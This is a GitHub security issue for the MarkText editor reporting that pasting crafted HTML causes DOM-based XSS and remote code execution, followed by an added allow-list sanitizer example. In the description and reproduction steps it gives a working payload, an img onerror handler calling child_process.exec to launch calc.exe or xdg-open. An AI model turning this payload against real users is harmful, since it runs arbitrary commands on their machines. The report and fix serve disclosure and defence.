
Security issue: DOM based XSS & RCE - from pasting vulnerable HTML #2990

Closed
1 task done
luiseok opened this issue Feb 7, 2022 · 0 comments · Fixed by #3002

Comments


luiseok commented Feb 7, 2022

Description

An attacker can induce Mark Text users to copy the HTML code below, which results in remote code execution via XSS.

<!-- for windows -->
<table><tr><img src onerror="require('child_process').exec('calc.exe')"></tr></table>
<!-- for linux (tested with kali) -->
<table><tr><img src onerror="require('child_process').exec('xdg-open .')"></tr></table>

The above code is inserted into the Mark Text DOM through the source code below, and the remote code execution is performed by calling child_process from the inline script.

ContentState.prototype.checkCopyType = function (html, text) {
  let type = 'normal'
  if (!html && text) {
    type = 'copyAsMarkdown'
    // Only the outermost start and end tag names are examined here.
    const match = /^<([a-zA-Z\d-]+)(?=\s|>).*?>[\s\S]+?<\/([a-zA-Z\d-]+)>$/.exec(text.trim())
    if (match && match[1]) {
      const tag = match[1]
      if (tag === 'table' && match.length === 3 && match[2] === 'table') {
        // Try to import a single table
        // The untrusted clipboard text is assigned to innerHTML of a detached
        // <table> element without sanitization; this is what lets the
        // inline onerror handler run.
        const tmp = document.createElement('table')
        tmp.innerHTML = text
        if (tmp.childElementCount === 1) {
          return 'htmlToMd'
        }
      }
      // TODO: We could try to import HTML elements such as headings, text and lists to markdown for better UX.
      // PARAGRAPH_TYPES is a list of block-level tag names defined elsewhere in the project.
      type = PARAGRAPH_TYPES.find(type => type === tag) ? 'copyAsHtml' : type
    }
  }
  return type
}

  • Can you reproduce the issue?

Steps to reproduce

  1. Copy the vulnerable HTML code
    • <table><tr><img src onerror="require('child_process').exec('calc.exe')"></tr></table>
  2. Paste it into Mark Text app

Expected behavior:

HTML should be sanitized before being pasted into the DOM.

Actual behavior:

There is no HTML sanitization procedure; it only checks whether the text is wrapped in <table> or not.

Link to an example: [optional]

bandicam.2022-02-08.01-33-25-900-cut.mp4
bandicam.2022-02-08.01-33-25-900.mp4

Versions

  • MarkText version: v0.16.3
  • Operating system:
    Windows 11 Version 21H2 - OS Build 22000.469
    Kali Linux Kali GNU/Linux Rolling 2021.4
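The block below is an added example, not code from the MarkText project, from PR #3002, or from the reporter. It places the check quoted in the report beside a strict allow-list import path for the single-table case that never hands clipboard text to innerHTML: the text is tokenized against a small grammar of table tags, rejected on anything outside that grammar, and re-serialized from the validated tokens. The grammar (which tags, which nesting, which attributes), the function names importPastedTable and legacyLooksLikeSingleTable, the simplified checkCopyType, and the sample inputs are all assumptions made for this example.

```javascript
'use strict';

// The check from the report, kept for comparison: it only looks at the outer
// tag names, so anything between <table> and </table> passes it.
const LEGACY_TABLE_RE = /^<([a-zA-Z\d-]+)(?=\s|>).*?>[\s\S]+?<\/([a-zA-Z\d-]+)>$/;
function legacyLooksLikeSingleTable(text) {
  const m = LEGACY_TABLE_RE.exec(text.trim());
  return Boolean(m && m[1] === 'table' && m[2] === 'table');
}

// Allow-list grammar for a pasted table (an assumption for this example, not
// MarkText's): which children each element may contain. Text content is only
// allowed inside th/td; whitespace-only text is tolerated anywhere.
const CHILDREN = {
  table: new Set(['thead', 'tbody', 'tr']),
  thead: new Set(['tr']),
  tbody: new Set(['tr']),
  tr: new Set(['th', 'td']),
  th: new Set(),
  td: new Set(),
};
// Allowed attributes and the value each must match: no on* handlers, no src.
const ATTRS = { colspan: /^\d{1,3}$/, rowspan: /^\d{1,3}$/, align: /^(left|center|right)$/i };

const ENTITIES = { amp: '&', lt: '<', gt: '>', quot: '"', '#39': "'", nbsp: '\u00a0' };
const decode = (s) => s.replace(/&(amp|lt|gt|quot|#39|nbsp);/g, (_, e) => ENTITIES[e]);
const ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;' };
const escape = (s) => s.replace(/[&<>"]/g, (c) => ESCAPES[c]);

// Parse the attribute part of one start tag. Returns [[name, value], ...] or
// null if anything is not an allowed, well-formed name="value" pair.
function parseAttrs(raw) {
  const re = /\s*([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'=<>]+))\s*/y;
  const out = [];
  let pos = 0;
  while (pos < raw.length) {
    re.lastIndex = pos;
    const m = re.exec(raw);
    if (m === null) return null;                    // bare attribute (src), junk, '/'
    const name = m[1].toLowerCase();
    const value = decode(m[2] ?? m[3] ?? m[4]);
    if (!ATTRS[name] || !ATTRS[name].test(value)) return null;  // e.g. onerror=...
    out.push([name, value]);
    pos = re.lastIndex;
  }
  return out;
}

// Validate `text` as exactly one table in the grammar above and return HTML
// re-serialized from the validated tokens, or null on anything outside it.
// The result can only contain the listed tags and attributes, with all text
// and attribute values re-escaped.
function importPastedTable(text) {
  const src = text.trim();
  const TAG = /<(\/?)([a-zA-Z][a-zA-Z0-9-]*)([^<>]*)>/y;
  const TEXT = /[^<]+/y;
  const stack = [];
  let out = '';
  let roots = 0;
  let pos = 0;
  while (pos < src.length) {
    TAG.lastIndex = pos;
    TEXT.lastIndex = pos;
    const parent = stack[stack.length - 1];
    let m = TAG.exec(src);
    if (m !== null) {
      const name = m[2].toLowerCase();
      if (m[1] === '/') {                                   // end tag
        if (parent !== name || m[3].trim() !== '') return null;
        stack.pop();
        out += `</${name}>`;
      } else {                                              // start tag
        if (!CHILDREN[name]) return null;                   // img, script, svg, ...
        if (parent === undefined) {
          if (name !== 'table' || roots++ > 0) return null; // one root, must be table
        } else if (!CHILDREN[parent].has(name)) {
          return null;                                      // wrong nesting
        }
        const attrs = parseAttrs(m[3].trim());
        if (attrs === null) return null;
        stack.push(name);
        const attrText = attrs.map(([k, v]) => ` ${k}="${escape(v)}"`).join('');
        out += `<${name}${attrText}>`;
      }
    } else if ((m = TEXT.exec(src)) !== null) {
      if (m[0].trim() !== '' && parent !== 'th' && parent !== 'td') return null;
      out += escape(decode(m[0]));
    } else {
      return null;                                          // comment, doctype, stray '<'
    }
    pos += m[0].length;
  }
  return stack.length === 0 && roots === 1 ? out : null;
}

// Decision function in the shape of the one in the report, with the innerHTML
// probe replaced by the allow-list import. The 'copyAsHtml' branch is left out
// because PARAGRAPH_TYPES is not on the page.
function checkCopyType(html, text) {
  if (!html && text) {
    return importPastedTable(text) !== null ? 'htmlToMd' : 'copyAsMarkdown';
  }
  return 'normal';
}

// Constructed inputs: the payload from the report and a benign table.
const PAYLOAD_FROM_REPORT =
  '<table><tr><img src onerror="require(\'child_process\').exec(\'calc.exe\')"></tr></table>';
const CLEAN_TABLE =
  '<table><tr><th align="left">Name</th><td colspan=2>1 &lt; 2 &amp; "x"</td></tr></table>';

console.log('legacy check accepts payload:', legacyLooksLikeSingleTable(PAYLOAD_FROM_REPORT));
console.log('allow-list import of payload:', importPastedTable(PAYLOAD_FROM_REPORT));
console.log('allow-list import of table:', importPastedTable(CLEAN_TABLE));
```

The payload is rejected because img is not in the grammar, not because onerror was recognized; the same gate rejects comments, a second root element, unclosed tags, inline markup inside cells and any attribute outside the allow-list, and the caller then falls back to treating the clipboard contents as plain text. Only the re-serialized string, never the clipboard text, would then be handed to innerHTML. The broader HTML import the TODO in the report mentions (headings, lists) cannot be covered by a grammar this small; that path would need an established sanitizer such as DOMPurify in front of any innerHTML assignment.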